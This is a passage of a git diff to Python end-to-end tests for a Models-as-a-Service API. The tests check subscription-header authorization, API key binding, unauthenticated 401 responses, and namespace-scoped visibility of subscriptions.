_create_sa_token(sa_name, namespace=ns) + sa_user = _sa_to_user(sa_name, namespace=ns) + + # Create test resources - user has valid subscription + _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) + _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user]) + + _wait_reconcile() + + # Test: GET /v1/models WITH non-existent subscription header + # Expected: 403 with "subscription not found" error + invalid_sub = "nonexistent-subscription-xyz" + log.info(f"Testing: GET /v1/models with invalid subscription header: {invalid_sub}") + url = f"{_maas_api_url()}/v1/models" + r = requests.get( + url, + headers={ + "Authorization": f"Bearer {oc_token}", + "x-maas-subscription": invalid_sub, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 403, f"Expected 403 for invalid 
subscription, got {r.status_code}: {r.text}" + + # Validate error response structure + data = r.json() + assert "error" in data, "Response missing 'error' field" + error = data["error"] + assert error.get("type") == "permission_error", f"Expected error type 'permission_error', got {error.get('type')}" + assert "message" in error, "Error missing 'message' field" + + # Message should indicate subscription not found + message = error["message"].lower() + assert "not found" in message or "subscription" in message, \ + f"Error message doesn't indicate subscription not found: {error['message']}" + + log.info(f"✅ Invalid subscription header → {r.status_code} (permission_error)") + + finally: + _delete_cr("maassubscription", subscription_name, namespace=ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) + _delete_sa(sa_name, namespace=ns) + _wait_reconcile() + + def test_access_denied_to_subscription_403(self): + """ + Test: Subscription exists but user is not in its MaaSAuthPolicy owner list. + User requests that subscription via header. + + Expected: HTTP 403 with error type: permission_error and message: + "access denied to requested subscription". 
+ """ + ns = _ns() + auth_policy_name = "e2e-models-access-denied-auth" + user_subscription = "e2e-models-user-sub" + other_subscription = "e2e-models-other-sub" + sa_user = "e2e-models-user-sa" + sa_other = "e2e-models-other-sa" + + try: + # Create two service accounts + oc_token_user = _create_sa_token(sa_user, namespace=ns) + _ = _create_sa_token(sa_other, namespace=ns) # SA creation only - token unused + + user_principal = _sa_to_user(sa_user, namespace=ns) + other_principal = _sa_to_user(sa_other, namespace=ns) + + # Create test resources + # Both users have access to the model via auth policy + _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[user_principal, other_principal]) + # Each user has their own subscription + _create_test_subscription(user_subscription, MODEL_REF, users=[user_principal]) + _create_test_subscription(other_subscription, MODEL_REF, users=[other_principal]) + + _wait_reconcile() + + # Test: User tries to use another user's subscription in header + # Expected: 403 with "access denied" error + log.info(f"Testing: GET /v1/models with inaccessible subscription: {other_subscription}") + url = f"{_maas_api_url()}/v1/models" + r = requests.get( + url, + headers={ + "Authorization": f"Bearer {oc_token_user}", + "x-maas-subscription": other_subscription, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 403, f"Expected 403 for inaccessible subscription, got {r.status_code}: {r.text}" + + # Validate error response structure + data = r.json() + assert "error" in data, "Response missing 'error' field" + error = data["error"] + assert error.get("type") == "permission_error", f"Expected error type 'permission_error', got {error.get('type')}" + assert "message" in error, "Error missing 'message' field" + + # Security: Bare subscription names return "not found" to avoid leaking namespace info. + # This prevents enumeration of subscriptions across namespaces. 
+ message = error["message"].lower() + assert "denied" in message or "access" in message or "not found" in message, \ + f"Error message should indicate permission issue: {error['message']}" + + log.info(f"✅ Access denied to subscription → {r.status_code} (permission_error)") + + finally: + _delete_cr("maassubscription", user_subscription, namespace=ns) + _delete_cr("maassubscription", other_subscription, namespace=ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) + _delete_sa(sa_user, namespace=ns) + _delete_sa(sa_other, namespace=ns) + _wait_reconcile() + + def test_api_key_ignores_subscription_header(self): + """ + Test: API key ignores x-maas-subscription header and uses bound subscription. + + Creates an API key bound to one subscription, then sends request with header + pointing to a different subscription. The API key should ignore the header + and return models from its bound subscription. + + Expected: HTTP 200 with models from the key's bound subscription (header ignored). 
+ """ + sa_name = "e2e-api-key-ignores-header-sa" + sa_ns = "default" + maas_ns = _ns() + sub1_name = "e2e-ignore-header-sub1" + sub2_name = "e2e-ignore-header-sub2" + auth1_name = "e2e-ignore-header-auth1" + auth2_name = "e2e-ignore-header-auth2" + api_key = None + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create two subscriptions with different models + log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}") + _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user]) + _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user], priority=10) + + log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}") + _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user], priority=5) + + _wait_reconcile() + + # Create API key - will be bound to highest priority subscription (sub1) + log.info(f"Creating API key (will bind to {sub1_name} - highest priority)") + api_key = _create_api_key(sa_token, name=f"{sa_name}-key") + + _wait_reconcile() + + # Test: Send request with header pointing to sub2, but key is bound to sub1 + log.info(f"Querying /v1/models with API key bound to {sub1_name} but header={sub2_name}") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": sub2_name, # Try to override with header + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + data = r.json() + models = data.get("data") or [] + + # Verify we got models from sub1 (not sub2 - header ignored) + assert len(models) > 0, "Expected at least one model" + + for model in models: + model_id = model.get("id") + subscriptions = [s["name"] for s in model.get("subscriptions", [])] + + # Models should be from sub1 (bound subscription), 
not sub2 (header) + assert sub1_name in subscriptions, \ + f"Model {model_id} should be in {sub1_name} (bound), not {sub2_name} (header). Got: {subscriptions}" + + # Should NOT find sub2's model (DISTINCT_MODEL_2_ID) + assert model_id != DISTINCT_MODEL_2_ID, \ + f"Should not see {DISTINCT_MODEL_2_ID} from {sub2_name} (header ignored)" + + log.info(f"✅ API key ignored x-maas-subscription header → returned {len(models)} model(s) from bound subscription") + + finally: + _delete_cr("maassubscription", sub1_name, namespace=maas_ns) + _delete_cr("maassubscription", sub2_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_multiple_api_keys_different_subscriptions(self): + """ + Test: Multiple API keys each bound to different subscriptions. + + Creates two API keys from the same user, each explicitly bound to a different + subscription. Verifies each key returns only its bound subscription's models. + + Expected: Each API key returns models only from its bound subscription. 
+ """ + sa_name = "e2e-multi-keys-sa" + sa_ns = "default" + maas_ns = _ns() + sub1_name = "e2e-multi-keys-sub1" + sub2_name = "e2e-multi-keys-sub2" + auth1_name = "e2e-multi-keys-auth1" + auth2_name = "e2e-multi-keys-auth2" + api_key1 = None + api_key2 = None + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create two subscriptions with different models + log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}") + _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user]) + _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user]) + + log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}") + _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + + _wait_reconcile() + + # Create two API keys, each bound to a different subscription + log.info(f"Creating API key 1 bound to {sub1_name}") + api_key1_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "key1", "subscription": sub1_name}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key1_response.status_code in (200, 201) + api_key1 = api_key1_response.json().get("key") + bound_sub1 = api_key1_response.json().get("subscription") + assert bound_sub1 == sub1_name, f"Key 1 should be bound to {sub1_name}, got {bound_sub1}" + + log.info(f"Creating API key 2 bound to {sub2_name}") + api_key2_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "key2", "subscription": sub2_name}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key2_response.status_code in (200, 201) + api_key2 = api_key2_response.json().get("key") + bound_sub2 = 
api_key2_response.json().get("subscription") + assert bound_sub2 == sub2_name, f"Key 2 should be bound to {sub2_name}, got {bound_sub2}" + + _wait_reconcile() + + # Test key1 - should return models from sub1 only + log.info(f"Testing API key 1 (bound to {sub1_name})") + r1 = requests.get( + f"{_maas_api_url()}/v1/models", + headers={"Authorization": f"Bearer {api_key1}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r1.status_code == 200, f"Expected 200 for key1, got {r1.status_code}: {r1.text}" + models1 = r1.json().get("data") or [] + model_ids1 = {m["id"] for m in models1} + + assert DISTINCT_MODEL_ID in model_ids1, f"Key1 should see {DISTINCT_MODEL_ID} from {sub1_name}" + assert DISTINCT_MODEL_2_ID not in model_ids1, f"Key1 should NOT see {DISTINCT_MODEL_2_ID} from {sub2_name}" + + # Test key2 - should return models from sub2 only + log.info(f"Testing API key 2 (bound to {sub2_name})") + r2 = requests.get( + f"{_maas_api_url()}/v1/models", + headers={"Authorization": f"Bearer {api_key2}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert r2.status_code == 200, f"Expected 200 for key2, got {r2.status_code}: {r2.text}" + models2 = r2.json().get("data") or [] + model_ids2 = {m["id"] for m in models2} + + assert DISTINCT_MODEL_2_ID in model_ids2, f"Key2 should see {DISTINCT_MODEL_2_ID} from {sub2_name}" + assert DISTINCT_MODEL_ID not in model_ids2, f"Key2 should NOT see {DISTINCT_MODEL_ID} from {sub1_name}" + + log.info(f"✅ Multiple API keys with different bindings → Key1: {len(models1)} models, Key2: {len(models2)} models") + + finally: + _delete_cr("maassubscription", sub1_name, namespace=maas_ns) + _delete_cr("maassubscription", sub2_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_service_account_token_multiple_subs_no_header(self): + """ + Test: K8s token with access to multiple 
subscriptions returns all models (no header). + + Creates a service account with access to two subscriptions (via group and user). + When querying without x-maas-subscription header, should return models from + all accessible subscriptions. + + Expected: HTTP 200 with models from both subscriptions. + """ + sa_name = "e2e-sa-multi-subs-no-header" + sa_ns = "default" + maas_ns = _ns() + sub1_name = "e2e-sa-multi-no-hdr-sub1" + sub2_name = "e2e-sa-multi-no-hdr-sub2" + auth1_name = "e2e-sa-multi-no-hdr-auth1" + auth2_name = "e2e-sa-multi-no-hdr-auth2" + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create two subscriptions with different models + # Sub1: Access via system:authenticated group + log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF} (group: system:authenticated)") + _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, groups=["system:authenticated"]) + _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, groups=["system:authenticated"]) + + # Sub2: Access via specific user + log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF} (user: {sa_user})") + _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + + _wait_reconcile() + + # Query with K8s token (no header) + log.info("Querying /v1/models with K8s token (no header) - should return models from both subscriptions") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={"Authorization": f"Bearer {sa_token}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + data = r.json() + models = data.get("data") or [] + model_ids = {m["id"] for m in models} + + # Should see models from BOTH subscriptions + assert DISTINCT_MODEL_ID in model_ids, \ + f"Should see {DISTINCT_MODEL_ID} from {sub1_name} (group access)" + assert 
DISTINCT_MODEL_2_ID in model_ids, \ + f"Should see {DISTINCT_MODEL_2_ID} from {sub2_name} (user access)" + + log.info(f"✅ K8s token with multiple subscriptions (no header) → {len(models)} models from both subscriptions") + + finally: + _delete_cr("maassubscription", sub1_name, namespace=maas_ns) + _delete_cr("maassubscription", sub2_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_service_account_token_multiple_subs_with_header(self): + """ + Test: K8s token with access to multiple subscriptions filters by header. + + Creates a service account with access to two subscriptions. When querying + with x-maas-subscription header, should return models from only the specified + subscription. + + Expected: HTTP 200 with models from only the specified subscription. + """ + sa_name = "e2e-sa-multi-subs-with-header" + sa_ns = "default" + maas_ns = _ns() + sub1_name = "e2e-sa-multi-hdr-sub1" + sub2_name = "e2e-sa-multi-hdr-sub2" + auth1_name = "e2e-sa-multi-hdr-auth1" + auth2_name = "e2e-sa-multi-hdr-auth2" + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create two subscriptions with different models + log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}") + _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user]) + _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user]) + + log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}") + _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + + _wait_reconcile() + + # Query with K8s token and header specifying sub1 + log.info(f"Querying /v1/models with K8s token and header: {sub1_name}") + r1 = requests.get( + 
f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {sa_token}", + "x-maas-subscription": sub1_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r1.status_code == 200, f"Expected 200, got {r1.status_code}: {r1.text}" + models1 = r1.json().get("data") or [] + model_ids1 = {m["id"] for m in models1} + + # Should see only models from sub1 + assert DISTINCT_MODEL_ID in model_ids1, f"Should see {DISTINCT_MODEL_ID} from {sub1_name}" + assert DISTINCT_MODEL_2_ID not in model_ids1, f"Should NOT see {DISTINCT_MODEL_2_ID} from {sub2_name}" + + # Query with K8s token and header specifying sub2 + log.info(f"Querying /v1/models with K8s token and header: {sub2_name}") + r2 = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {sa_token}", + "x-maas-subscription": sub2_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r2.status_code == 200, f"Expected 200, got {r2.status_code}: {r2.text}" + models2 = r2.json().get("data") or [] + model_ids2 = {m["id"] for m in models2} + + # Should see only models from sub2 + assert DISTINCT_MODEL_2_ID in model_ids2, f"Should see {DISTINCT_MODEL_2_ID} from {sub2_name}" + assert DISTINCT_MODEL_ID not in model_ids2, f"Should NOT see {DISTINCT_MODEL_ID} from {sub1_name}" + + log.info(f"✅ K8s token with header filtering → Sub1: {len(models1)} models, Sub2: {len(models2)} models") + + finally: + _delete_cr("maassubscription", sub1_name, namespace=maas_ns) + _delete_cr("maassubscription", sub2_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_unauthenticated_request_401(self): + """ + Test: Request to /v1/models without Authorization header gets 401. + + Expected: HTTP 401 (authentication_error). 
+ """ + # Test: GET /v1/models WITHOUT Authorization header + # Expected: 401 Unauthorized + log.info("Testing: GET /v1/models without Authorization header") + url = f"{_maas_api_url()}/v1/models" + r = requests.get( + url, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 401, f"Expected 401 for unauthenticated request, got {r.status_code}: {r.text}" + + # Validate error response structure (if present) + try: + data = r.json() + if "error" in data: + error = data["error"] + # If error type is present, it should be authentication_error + if "type" in error: + assert error["type"] == "authentication_error", \ + f"Expected error type 'authentication_error', got {error.get('type')}" + except (json.JSONDecodeError, ValueError): + # Response might not be JSON, which is acceptable for 401 + pass + + log.info(f"✅ Unauthenticated request → {r.status_code}") diff --git a/test/e2e/tests/test_namespace_scoping.py b/test/e2e/tests/test_namespace_scoping.py index 621304e3a..465d920ff 100644 --- a/test/e2e/tests/test_namespace_scoping.py +++ b/test/e2e/tests/test_namespace_scoping.py @@ -1,12 +1,9 @@ """ -E2E tests for namespace scoping in MaaS Controller. +E2E tests for namespace scoping in MaaS. -Tests that MaaSAuthPolicy and MaaSSubscription can reference MaaSModelRef resources -in different namespaces, and that the generated AuthPolicies and TokenRateLimitPolicies -are created in the correct (model's) namespace. - -Uses real LLMInferenceService models and makes actual inference requests to verify -the entire flow works end-to-end. +Tests that (1) MaaS API and controller only watch the subscription namespace for MaaSAuthPolicy and +MaaSSubscription, and (2) when those CRs reference a model by (name, namespace), only that exact +model receives the generated AuthPolicy or TokenRateLimitPolicy. Requires: - GATEWAY_HOST env var (e.g. 
maas.apps.cluster.example.com) @@ -18,9 +15,9 @@ Environment variables (all optional, with defaults): - GATEWAY_HOST: Gateway hostname (required) - MAAS_API_BASE_URL: MaaS API URL (required) - - MAAS_NAMESPACE: Default MaaS namespace (default: opendatahub) + - MAAS_SUBSCRIPTION_NAMESPACE: MaaS subscription namespace (default: models-as-a-service) - E2E_TIMEOUT: Request timeout in seconds (default: 30) - - E2E_RECONCILE_WAIT: Wait time for controller reconciliation (default: 10) + - E2E_RECONCILE_WAIT: Wait time for controller reconciliation (default: 8) - E2E_SKIP_TLS_VERIFY: Set to "true" to skip TLS verification - E2E_MODEL_REF: Model ref for tests (default: facebook-opt-125m-simulated) - E2E_MODEL_NAMESPACE: Namespace where model MaaSModelRef lives (default: llm) @@ -41,25 +38,15 @@ # Constants TIMEOUT = int(os.environ.get("E2E_TIMEOUT", "30")) -RECONCILE_WAIT = int(os.environ.get("E2E_RECONCILE_WAIT", "10")) +RECONCILE_WAIT = int(os.environ.get("E2E_RECONCILE_WAIT", "8")) TLS_VERIFY = os.environ.get("E2E_SKIP_TLS_VERIFY", "").lower() != "true" MODEL_REF = os.environ.get("E2E_MODEL_REF", "facebook-opt-125m-simulated") -MODEL_NAME = os.environ.get("E2E_MODEL_NAME", "facebook/opt-125m") MODEL_NAMESPACE = os.environ.get("E2E_MODEL_NAMESPACE", "llm") def _ns(): - """Default MaaS namespace.""" - return os.environ.get("MAAS_NAMESPACE", "opendatahub") - - -def _gateway_url(): - """Gateway URL for inference requests.""" - host = os.environ.get("GATEWAY_HOST", "") - if not host: - raise RuntimeError("GATEWAY_HOST env var is required") - scheme = "http" if os.environ.get("INSECURE_HTTP", "").lower() == "true" else "https" - return f"{scheme}://{host}" + """Default MaaS subscription namespace.""" + return os.environ.get("MAAS_SUBSCRIPTION_NAMESPACE", "models-as-a-service") def _maas_api_url(): @@ -126,6 +113,20 @@ def _delete_cr(kind: str, name: str, namespace: str): ) +def _create_external_model(name: str, namespace: str, provider: str = "test", endpoint: str = 
"test.example.com"): + """Create an ExternalModel CR with the given name and namespace.""" + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "ExternalModel", + "metadata": {"name": name, "namespace": namespace}, + "spec": { + "provider": provider, + "endpoint": endpoint, + "credentialRef": {"name": f"{name}-credentials"}, + }, + }) + + def _get_cr(kind: str, name: str, namespace: str) -> Optional[dict]: """Get CR as dict, or None if not found.""" result = subprocess.run( @@ -138,30 +139,6 @@ def _get_cr(kind: str, name: str, namespace: str) -> Optional[dict]: return json.loads(result.stdout) -def _wait_for_cr(kind: str, name: str, namespace: str, timeout: int = 30) -> bool: - """Wait for CR to exist.""" - deadline = time.time() + timeout - while time.time() < deadline: - if _get_cr(kind, name, namespace): - return True - time.sleep(2) - return False - - -def _wait_for_authpolicy_enforced(name: str, namespace: str, timeout: int = 60) -> bool: - """Wait for AuthPolicy to be enforced.""" - deadline = time.time() + timeout - while time.time() < deadline: - cr = _get_cr("AuthPolicy", name, namespace) - if cr: - conditions = cr.get("status", {}).get("conditions", []) - for condition in conditions: - if condition.get("type") == "Enforced" and condition.get("status") == "True": - return True - time.sleep(3) - return False - - def _create_namespace(name: str): """Create namespace if it doesn't exist.""" result = subprocess.run( @@ -182,73 +159,39 @@ def _delete_namespace(name: str): ) -def _list_models(api_key: str, model_ref: str, model_namespace: str = None, subscription: str = "simulator-subscription") -> requests.Response: - """List available models.""" - url = f"{_gateway_url()}/llm/{model_ref}/v1/models" +def _call_subscriptions_select(api_key: str, username: str, groups: list, requested_subscription: str = "") -> requests.Response: + """Call MaaS API POST /v1/subscriptions/select. 
Returns the response (always 200 with body).""" + url = f"{_maas_api_url()}/internal/v1/subscriptions/select" headers = {"Authorization": f"Bearer {api_key}"} - if subscription: - headers["x-maas-subscription"] = subscription - return requests.get( - url, - headers=headers, - timeout=TIMEOUT, - verify=TLS_VERIFY, - ) - - -def _inference(api_key: str, model_ref: str, model_namespace: str, subscription: str = "simulator-subscription") -> requests.Response: - """Make an inference request to a model.""" - url = f"{_gateway_url()}/llm/{model_ref}/v1/completions" - headers = { - "Authorization": f"Bearer {api_key}", - "Content-Type": "application/json", - } - if subscription: - headers["x-maas-subscription"] = subscription + payload = {"username": username, "groups": groups} + if requested_subscription: + payload["requestedSubscription"] = requested_subscription return requests.post( url, headers=headers, - json={"model": MODEL_NAME, "prompt": "Hello", "max_tokens": 3}, + json=payload, timeout=TIMEOUT, verify=TLS_VERIFY, ) -def _poll_status(api_key: str, model_ref: str, model_namespace: str, expected: int, timeout: int = 60, interval: int = 2, subscription: str = "simulator-subscription") -> requests.Response: - """Poll inference endpoint until expected status or timeout.""" - deadline = time.time() + timeout - last_response = None - last_error = None - while time.time() < deadline: - try: - r = _inference(api_key, model_ref, model_namespace, subscription=subscription) - last_response = r - if r.status_code == expected: - return r - log.warning(f"Got status {r.status_code}, expected {expected}. 
Response: {r.text[:200]}") - except Exception as e: - log.warning(f"Request failed: {type(e).__name__}: {e}") - last_error = e - time.sleep(interval) - - if last_response: - status = f"{last_response.status_code}: {last_response.text[:200]}" - elif last_error: - status = f"Exception: {type(last_error).__name__}: {last_error}" - else: - status = "No response" - raise AssertionError(f"Expected status {expected} within {timeout}s, got {status}") +def _wait_reconcile(seconds=None): + """Wait for controller reconciliation.""" + time.sleep(seconds or RECONCILE_WAIT) -@pytest.fixture(scope="module") -def policy_namespace(): - """Create a test namespace for policies.""" - ns = f"e2e-ns-policy-{uuid.uuid4().hex[:6]}" - log.info(f"Creating policy namespace: {ns}") - _create_namespace(ns) - yield ns - log.info(f"Cleaning up policy namespace: {ns}") - _delete_namespace(ns) +def _get_cr_annotation(kind: str, name: str, namespace: str, key: str): + """Return the annotation value for key on the CR, or \"\" if not found.""" + result = subprocess.run( + ["oc", "get", kind, name, "-n", namespace, "-o", "json"], + capture_output=True, + text=True, + ) + if result.returncode != 0: + return "" + obj = json.loads(result.stdout) + annotations = obj.get("metadata", {}).get("annotations") or {} + return annotations.get(key, "") or "" @pytest.fixture(scope="module") @@ -258,447 +201,316 @@ def api_key(): return key -class TestCrossNamespaceAuthPolicy: - """Test MaaSAuthPolicy can reference models in different namespaces.""" +class TestMaaSAPIWatchNamespace: + """Test that MaaS API only gets MaaSSubscription from the subscription namespace (MAAS_SUBSCRIPTION_NAMESPACE).""" - def test_auth_policy_in_different_namespace(self, policy_namespace, api_key): + def test_subscription_in_subscription_namespace_visible_to_api(self, api_key): """ - Create MaaSAuthPolicy in policy-namespace that references model in llm namespace. - Verify that AuthPolicy is created in llm namespace (model's namespace). 
- Verify that inference requests work. + MaaSSubscription in the subscription namespace should be visible to the API. + POST /v1/subscriptions/select with that subscription name should succeed. """ - policy_name = f"cross-ns-auth-{uuid.uuid4().hex[:6]}" - - log.info(f"Creating cross-namespace MaaSAuthPolicy {policy_name}") - log.info(f" Policy namespace: {policy_namespace}") - log.info(f" Model namespace: {MODEL_NAMESPACE}") - - # Create MaaSAuthPolicy in policy namespace referencing model in MODEL_NAMESPACE - _apply_cr({ - "apiVersion": "maas.opendatahub.io/v1alpha1", - "kind": "MaaSAuthPolicy", - "metadata": {"name": policy_name, "namespace": policy_namespace}, - "spec": { - "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], - "subjects": {"groups": [{"name": "system:authenticated"}]}, - }, - }) - + sub_name = f"e2e-api-visible-{uuid.uuid4().hex[:6]}" + ns = _ns() try: - # Wait for controller to reconcile - time.sleep(RECONCILE_WAIT) - - # Verify MaaSAuthPolicy exists - maas_policy = _get_cr("MaaSAuthPolicy", policy_name, policy_namespace) - assert maas_policy is not None, f"MaaSAuthPolicy {policy_name} not found" - - # Verify generated AuthPolicy is created in MODEL namespace (not policy namespace) - auth_policy_name = f"maas-auth-{MODEL_REF}" - auth_policy = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE) - assert auth_policy is not None, \ - f"AuthPolicy {auth_policy_name} not found in model namespace {MODEL_NAMESPACE}" - - # Wait for AuthPolicy to be enforced - log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...") - enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60) - assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout" - - # Verify AuthPolicy is NOT in policy namespace - auth_in_policy_ns = _get_cr("AuthPolicy", auth_policy_name, policy_namespace) - assert auth_in_policy_ns is None, \ - f"AuthPolicy should not exist in policy namespace {policy_namespace}" 
- - # Test model listing endpoint - log.info("Testing /v1/models endpoint with cross-namespace AuthPolicy") - r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE) - assert r.status_code == 200, f"Model listing failed: {r.status_code}" - models_data = r.json() - model_ids = [m.get("id") for m in models_data.get("data", [])] - assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}" - log.info(f"✓ Model {MODEL_NAME} found in /v1/models response") - - # Make inference request to verify everything works - log.info("Testing inference request with cross-namespace AuthPolicy") - r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90) - assert r.status_code == 200, f"Expected 200, got {r.status_code}" - - log.info("✓ Cross-namespace AuthPolicy test passed") - + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": {"name": sub_name, "namespace": ns}, + "spec": { + "owner": {"groups": [{"name": "system:authenticated"}]}, + "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}], + }, + }) + _wait_reconcile() + + r = _call_subscriptions_select(api_key, "e2e-api-user", ["system:authenticated"], requested_subscription=sub_name) + assert r.status_code == 200, f"subscriptions/select failed: {r.status_code} {r.text}" + data = r.json() + assert data.get("error") != "not_found", ( + f"Subscription {sub_name} in subscription namespace should be visible to API, got: {data}" + ) + assert data.get("name") == sub_name, ( + f"Expected name={sub_name}, got: {data}" + ) + log.info(f"✓ Subscription {sub_name} in {ns} is visible to MaaS API") finally: - _delete_cr("MaaSAuthPolicy", policy_name, policy_namespace) - # Note: We don't delete the AuthPolicy because other tests may rely on it + _delete_cr("MaaSSubscription", sub_name, ns) + _wait_reconcile() - def test_multiple_policies_different_namespaces_same_model(self, policy_namespace, 
api_key): + def test_subscription_in_another_namespace_not_visible_to_api(self, api_key): """ - Create multiple MaaSAuthPolicies in different namespaces referencing the same model. - Verify that they aggregate correctly into a single AuthPolicy. - Test the deletion bug fix: deleting one policy should NOT delete the AuthPolicy. + MaaSSubscription in a namespace other than the subscription namespace should NOT be visible to the API. + POST /v1/subscriptions/select with that subscription name should return not_found. """ - policy1_name = f"multi-ns-policy1-{uuid.uuid4().hex[:6]}" - policy2_name = f"multi-ns-policy2-{uuid.uuid4().hex[:6]}" - test_group = f"test-group-{uuid.uuid4().hex[:4]}" + sub_name = f"e2e-api-hidden-{uuid.uuid4().hex[:6]}" + other_ns = "e2e-api-unwatched-ns" + _create_namespace(other_ns) + try: + _apply_cr({ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": {"name": sub_name, "namespace": other_ns}, + "spec": { + "owner": {"groups": [{"name": "system:authenticated"}]}, + "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 1, "window": "1m"}]}], + }, + }) + _wait_reconcile() + + r = _call_subscriptions_select(api_key, "e2e-api-user", ["system:authenticated"], requested_subscription=sub_name) + assert r.status_code == 200, f"subscriptions/select failed: {r.status_code} {r.text}" + data = r.json() + assert data.get("error") == "not_found", ( + f"Subscription {sub_name} in {other_ns} should NOT be visible to API (expected not_found), got: {data}" + ) + log.info(f"✓ Subscription {sub_name} in {other_ns} is correctly not visible to MaaS API") + finally: + _delete_cr("MaaSSubscription", sub_name, other_ns) + _delete_namespace(other_ns) + _wait_reconcile() - # Create second policy namespace - policy_namespace2 = f"e2e-ns-policy2-{uuid.uuid4().hex[:6]}" - _create_namespace(policy_namespace2) - try: - log.info(f"Creating two MaaSAuthPolicies in different namespaces for same 
